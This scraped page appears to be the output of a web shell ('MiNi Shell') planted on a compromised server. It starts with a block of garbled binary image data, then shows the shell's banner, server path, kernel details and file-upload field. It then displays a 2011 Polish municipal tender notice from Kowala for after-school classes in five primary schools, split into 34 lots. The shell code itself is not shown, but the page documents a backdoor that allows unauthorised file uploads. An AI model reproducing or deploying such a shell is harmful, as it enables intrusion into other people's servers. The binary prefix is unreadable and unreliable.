JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111230/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111230/445228-N-2011.html

<p class="kh_header"><b>Kowala: Usługi edukacyjne obejmujące prowadzenie zajęć dla uczestników projektu pn.: Dobry start - indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w gminie Kowala realizowanego w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Europejski Fundusz Społeczny</b><br>
<b>Numer ogłoszenia: 445228 - 2011; data zamieszczenia: 30.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Kowali , Kowala 105a, 26-624 Kowala, woj. mazowieckie, tel. 0-48 6101760, faks 0-48 6101760.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.kowala.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne obejmujące prowadzenie zajęć dla uczestników projektu pn.: Dobry start - indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w gminie Kowala realizowanego w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Europejski Fundusz Społeczny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia są usługi edukacyjne obejmujące prowadzenie zajęć w ramach projektu pt. Dobry start - indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w gminie Kowala. Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX - Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
2. 	Prowadzący zajęcia pozalekcyjne będzie odpowiadał za przygotowanie, realizację i dokumentację zajęć dodatkowych dla uczniów, działania dostosowywane będą do potrzeb uczniów w ramach zajęć. Do obowiązków prowadzącego będzie należeć m.in.:
a) 	prowadzenie zajęć pozalekcyjnych (zajęcia po obowiązkowych lekcjach w godzinach dostosowanych do wymogów uczestników i warunków szkoły) w terminie maksymalnym do 30 czerwca 2012 roku. Termin wykonania poszczególnych usług będzie ustalany indywidualnie z dyrektorem właściwej szkoły.
b) 	dokumentowanie zajęć pozalekcyjnych (kart czasu pracy, dzienników zajęć, list obecności);
c) 	sporządzanie sprawozdań miesięcznych z realizacji zajęć, współpraca z dyrektorem szkoły, w której prowadzone będą zajęcia;
d) 	opracowanie w terminie 7 dni od daty zawarcia umowy, programu i planu pracy zajęć pozalekcyjnych obejmującego harmonogram oraz zakres zadania dla uczestników projektu Dobry start - indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkół podstawowych w gminie Kowala i przedstawienia do akceptacji dyrektorowi szkoły i koordynatorowi projektu,
e) 	szczegółowy zakres obowiązków ujęty został w projekcie umowy, stanowiącej załącznik nr 6 do SIWZ. Zakres obowiązków odnosi się do wszystkich poniżej wymienionych 34 części zamówienia.
f) 	Usługi będą realizowane w niżej wymienionych szkołach i specjalnościach. Jednostka 1 godzina lekcyjna używana w SIWZ odpowiada czasowo 45 minutom.
3. 	Przedmiot zamówienia podzielono na 34 części tak, by umożliwić wykonawcom złożenie oferty na każdą część zamówienia wskazaną w niniejszym opisie przedmiotu zamówienia. Wykonawca wybiera część zamówienia, której lub których może być Wykonawcą.
4. 	Zamówienie obejmuje prowadzenie zajęć wg niżej wymienionych rodzajów przez wykonawcę zamówienia i składa się z następujących części:
Szkoła Podstawowa w Bardzicach
Część zamówienia nr 1
Rodzaj zajęć: zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu oraz zagrożonych dysleksją
Liczba godzin ogółem: 60 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 2
Rodzaj zajęć: zajęcia dla uczniów z trudnościami w zdobywaniu umiejętności matematycznych 
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 3
Rodzaj zajęć: gimnastyka korekcyjna
Liczba godzin ogółem:120 h (2 grupy po 60h)
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 4
Rodzaj zajęć: zajęcia logopedyczne
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 5
Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów w dziedzinie matematyczno - przyrodniczej/kluby małego odkrywcy
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 6
Rodzaj zajęć: zajęcia rozwijające zdolności plastyczne
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Szkoła Podstawowa w Kończycach-Kolonii
Część zamówienia nr 7
Rodzaj zajęć: zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu oraz zagrożonych dysleksją
Liczba godzin ogółem: 60 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 8
Rodzaj zajęć: zajęcia dla uczniów z trudnościami w zdobywaniu umiejętności matematycznych 
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 9
Rodzaj zajęć: gimnastyka korekcyjna
Liczba godzin ogółem: 60 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 10
Rodzaj zajęć: zajęcia logopedyczne
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 11
Rodzaj zajęć: zajęcia rozwijające zdolności humanistyczne, teatralno-recytatorskie
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.

Szkoła Podstawowa w Kowali
Część zamówienia nr 12
Rodzaj zajęć: zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu oraz zagrożonych dysleksją
Liczba godzin ogółem: 180 h (3 grupy po 60 h)
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 13
Rodzaj zajęć: zajęcia dla uczniów z trudnościami w zdobywaniu umiejętności matematycznych 
Liczba godzin ogółem: 60 h (2 grupy po 30h)
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 14
Rodzaj zajęć: gimnastyka korekcyjna
Liczba godzin ogółem: 180 h (3 grupy po 60h)
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 15
Rodzaj zajęć: warsztaty socjoterapeutyczne dla dzieci z zaburzeniami komunikacji społecznej
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 16
Rodzaj zajęć: zajęcia dla dzieci z trudnościami w opanowaniu języka obcego 
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 17
Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów w dziedzinie matematyczno - przyrodniczej/kluby małego odkrywcy
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 18
Rodzaj zajęć: zajęcia rozwijające zdolności humanistyczne, teatralno-recytatorskie
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 19
Rodzaj zajęć: zajęcia rozwijające zdolności językowe
Liczba godzin ogółem:30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 20
Rodzaj zajęć: warsztaty instrumentalno-wokalne
Liczba godzin ogółem:30 h
Harmonogram:
- od stycznia do czerwca 2012 r.

Szkoła Podstawowa w Mazowszanach
Część zamówienia nr 21
Rodzaj zajęć: zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu oraz zagrożonych dysleksją
Liczba godzin ogółem: 300 h (5 grup po 60h)
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 22
Rodzaj zajęć: zajęcia dla uczniów z trudnościami w zdobywaniu umiejętności matematycznych 
Liczba godzin ogółem: 90 h (3 grupy po 30h)
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 23
Rodzaj zajęć: gimnastyka korekcyjna
Liczba godzin ogółem:120 h (2 grupy po 60h)
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 24
Rodzaj zajęć: zajęcia socjoterapeutyczne dla dzieci z zaburzeniami komunikacji społecznej
Liczba godzin ogółem: 60 h (2 grupy po 30h)
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 25
Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów w dziedzinie matematyczno - przyrodniczej/kluby małego odkrywcy
Liczba godzin ogółem:30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 26
Rodzaj zajęć: zajęcia rozwijające zdolności humanistyczne, teatralno-recytatorskie
Liczba godzin ogółem:30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 27
Rodzaj zajęć: zajęcia rozwijające zdolności plastyczne
Liczba godzin ogółem:30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 28
Rodzaj zajęć: warsztaty instrumentalno-wokalne
Liczba godzin ogółem:30 h
Harmonogram:
- od stycznia do czerwca 2012 r.

Szkoła Podstawowa w Młodocinie
Część zamówienia nr 29
Rodzaj zajęć: zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu oraz zagrożonych dysleksją
Liczba godzin ogółem: 60 h 
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 30
Rodzaj zajęć: zajęcia dla uczniów z trudnościami w zdobywaniu umiejętności matematycznych 
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 31
Rodzaj zajęć: gimnastyka korekcyjna
Liczba godzin ogółem: 60 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 32
Rodzaj zajęć: zajęcia rozwijające zainteresowania uczniów w dziedzinie matematyczno - przyrodniczej/kluby małego odkrywcy
Liczba godzin ogółem:30 h
Harmonogram:
- od stycznia do czerwca 2012 r.
Część zamówienia nr 33
Rodzaj zajęć: zajęcia rozwijające zdolności plastyczne
Liczba godzin ogółem: 30 h
Harmonogram:
- od stycznia do czerwca 2012 r.

PSP w Bardzicach, Kończycach, Kowali, Mazowszanach i Młodocinie
Część zamówienia nr 34
Rodzaj zajęć: warsztaty psychologiczno-pedagogiczne uczniów ze wszystkich szkół oraz ich rodziców
Liczba godzin ogółem:  150h (5 szkół po 30h)
Harmonogram:
- od stycznia do czerwca 2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 34.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca posiada:
- 	stopień awansu zawodowego minimum nauczyciela kontraktowego,
- 	spełnia wymagania dotyczące wykształcenia i kwalifikacji określonych Rozporządzeniem MEN z dn. 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009r. Nr 50, poz. 400).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca posiada przynajmniej 2-letni staż pracy pedagogicznej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że jest osobą zdolną do wykonania zamówienia lub dysponuje co najmniej jedną osobą zdolną do wykonywania zamówienia, tj. posiadającą odpowiednie wykształcenie oraz posiada stopień awansu zawodowego co najmniej nauczyciela kontraktowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że jest osobą zdolną do wykonania zamówienia lub dysponuje co najmniej jedną osobą zdolną do wykonywania zamówienia, tj. posiadającą odpowiednie wykształcenie oraz posiada stopień awansu zawodowego co najmniej nauczyciela kontraktowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.kowala.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GMINA KOWALA
26-624 Kowala, Kowala 105A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.01.2012 godzina 10:00, miejsce: GMINA KOWALA
26-624 Kowala, Kowala 105A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Europejski Fundusz Społeczny.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com